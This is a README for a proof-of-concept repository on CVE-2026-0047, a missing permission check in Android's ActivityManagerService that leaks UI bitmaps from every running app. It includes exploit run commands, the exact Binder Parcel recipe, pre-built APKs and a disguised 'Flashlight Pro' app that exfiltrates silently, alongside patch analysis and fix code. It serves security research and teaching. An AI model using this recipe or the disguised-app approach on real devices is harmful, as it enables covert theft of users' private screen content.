## https://sploitus.com/exploit?id=C3E9251E-4FF9-59FD-AE92-266794E6812A
# CVE-2026-0047: Missing Permission Check in ActivityManagerService

**Heap of bitmaps stolen from every running app — zero permissions, zero user interaction.**

A missing `enforceCallingOrSelfPermission(DUMP)` check in `ActivityManagerService.dumpBitmapsProto()` allows any installed app to exfiltrate UI bitmaps from all running processes on Android 16 QPR2 Beta (Baklava).

> **Note:** We did not discover this vulnerability. All credit for finding and responsibly reporting goes to the original researchers. This repository contains our independent **patch analysis, reproduction, and educational writeup** to help the security community understand the bug class and exploitation techniques involved.

| | |
|---|---|
| **CVE** | CVE-2026-0047 |
| **Severity** | Critical — CVSS 8.4 |
| **Component** | `ActivityManagerService.dumpBitmapsProto()` |
| **Root Cause** | Missing permission check (CWE-280) |
| **Impact** | Any zero-permission app steals UI bitmaps from all running apps |
| **Affected** | Android 16 QPR2 Beta 1–3 (Baklava), patch level < 2026-03-01 |
| **Patched** | [March 2026 Android Security Bulletin](https://source.android.com/docs/security/bulletin/2026/2026-03-01) |

## Repository Contents

```
├── app/                    # PoC exploit app (audit tool UI)
├── attacker/               # "Flashlight Pro" — disguised attacker app
├── apk/                    # Pre-built APKs (ready to install)
│   ├── cve-2026-0047-poc.apk
│   └── flashlight-pro-attacker.apk
├── exploit.sh              # Single-shot exploit script
├── gradle/                 # Gradle wrapper
└── README.md
```

## Setting Up the Test Environment

You need an Android 16 QPR2 Beta (Baklava) emulator with a security patch level before `2026-03-01`:

```bash
# Download the vulnerable system image
sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"

# Create an AVD
avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"

# Boot the emulator
emulator -avd baklava &

# Verify the patch level is pre-fix
adb shell getprop ro.build.version.security_patch
# Anything before 2026-03-01 is vulnerable
```

## Quick Start

### Option 1: Single-shot script (recommended)

```bash
# Full run: set up emulator, build, exploit, extract stolen bitmaps
./exploit.sh --setup-emulator

# Already have a Baklava emulator running?
./exploit.sh

# Skip build, just run exploit
./exploit.sh --skip-build
```

### Option 2: Pre-built APK

```bash
# Install the PoC app
adb install apk/cve-2026-0047-poc.apk

# Open some apps (Settings, email, etc.) to have visible UI
adb shell am start -n com.android.settings/.Settings

# Launch the PoC
adb shell am start -n com.poc.cve20260047/.MainActivity

# Tap "Exploit dumpBitmapsProto()" button
```

### Option 3: Attacker simulation ("Flashlight Pro")

```bash
# Install the disguised attacker app — declares ZERO permissions
adb install apk/flashlight-pro-attacker.apk

# Launch it — exfiltration happens silently on startup
adb shell am start -n com.poc.cve20260047.attacker/.MainActivity
```

## How It Works

1. **Raw Binder probe** — Transaction code `#117` on the `activity` service maps to `dumpBitmapsProto()`. Sending it without arguments causes a `NullPointerException` inside AMS (not a `SecurityException`), proving the method body executes without any permission check.

2. **Raw Binder exploit** — We use `IBinder.transact()` to send a hand-crafted Parcel directly to AMS. This bypasses Android's hidden API restrictions entirely — no `hidden_api_policy` setting needed. The Parcel contains:
   - Interface token (`android.app.IActivityManager`)
   - Non-null marker + `ParcelFileDescriptor` (pipe write end)
   - Empty string array (all processes)
   - `userId = -2` (`USER_CURRENT`)
   - `dumpAll = true`
   - `format = "png"`

3. **Bitmap extraction** — AMS writes protobuf data containing PNG bitmaps to the pipe. We scan for PNG magic bytes (`89 50 4E 47`) and IEND trailers to extract individual images.

### Result

On a Baklava emulator (`BP41.250725.007`, patch `2025-08-05`) with Settings, Clock, and Files open:

- **679,091 bytes** of protobuf data
- **63 valid PNG images** stolen from all running apps
- **Zero permissions** declared by the PoC app

## How It Was Fixed

Google added `enforceCallingOrSelfPermission(DUMP)` as the first line of `dumpBitmapsProto()`, so unprivileged callers now receive a `SecurityException` before any bitmap data is accessed.
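As an added illustration of that fix pattern (this is not the AOSP source; the class name, method signature, `mContext` field and the `writeBitmaps` placeholder are assumed), the check must sit before any data access and, just as importantly, before any `Binder.clearCallingIdentity()` call, otherwise the "calling" identity is system_server's own and the check passes for everyone:

```java
import android.content.Context;
import android.os.Binder;
import android.os.ParcelFileDescriptor;

// Added illustration of the fix pattern, not AOSP code. Class name, signature
// and the mContext field are assumed for the example.
public class BitmapDumpExample {
    private final Context mContext;

    public BitmapDumpExample(Context context) {
        mContext = context;
    }

    // Pre-fix shape: the body runs for any Binder caller, so a zero-permission
    // app that reaches this transaction receives every process's bitmaps.
    public void dumpBitmapsProtoVulnerable(ParcelFileDescriptor pfd,
            String[] procNames, int userId, boolean dumpAll, String format) {
        writeBitmaps(pfd, procNames, userId, dumpAll, format);
    }

    // Post-fix shape: fail closed before touching any data. Callers that do not
    // hold android.permission.DUMP (signature-level, unavailable to normal apps)
    // get a SecurityException; the system process itself is still allowed.
    public void dumpBitmapsProtoFixed(ParcelFileDescriptor pfd,
            String[] procNames, int userId, boolean dumpAll, String format) {
        mContext.enforceCallingOrSelfPermission(
                android.Manifest.permission.DUMP, "dumpBitmapsProto");
        writeBitmaps(pfd, procNames, userId, dumpAll, format);
    }

    // Anti-pattern to flag in review: clearing the calling identity first.
    // After clearCallingIdentity(), getCallingUid() reports system_server's
    // own uid, so the "OrSelf" check succeeds for every caller (dead code).
    public void dumpBitmapsProtoStillBroken(ParcelFileDescriptor pfd,
            String[] procNames, int userId, boolean dumpAll, String format) {
        final long token = Binder.clearCallingIdentity();
        try {
            mContext.enforceCallingOrSelfPermission(
                    android.Manifest.permission.DUMP, "dumpBitmapsProto");
            writeBitmaps(pfd, procNames, userId, dumpAll, format);
        } finally {
            Binder.restoreCallingIdentity(token);
        }
    }

    // Placeholder for the real per-process bitmap walk (assumed, not shown here).
    private void writeBitmaps(ParcelFileDescriptor pfd, String[] procNames,
            int userId, boolean dumpAll, String format) {
        // iterate the matching processes and write protobuf-wrapped bitmaps to pfd
    }
}
```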

## References

- [Android Security Bulletin — March 2026](https://source.android.com/docs/security/bulletin/2026/2026-03-01)
- [CVE-2026-0047 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-0047)
- [CWE-280: Improper Handling of Insufficient Permissions](https://cwe.mitre.org/data/definitions/280.html)
- [Blog post: Full analysis and exploitation walkthrough](https://www.mobilehackingcourse.com/cve-2026-0047-activitymanager-eop/)

## Credits

Research and PoC by [Mobile Hacking Lab](https://www.mobilehackinglab.com). We reproduced this vulnerability independently for educational purposes.

## Disclaimer

This proof of concept is provided for **educational and authorized security research purposes only**. Only use it on devices and environments you own or have explicit permission to test. The authors are not responsible for any misuse.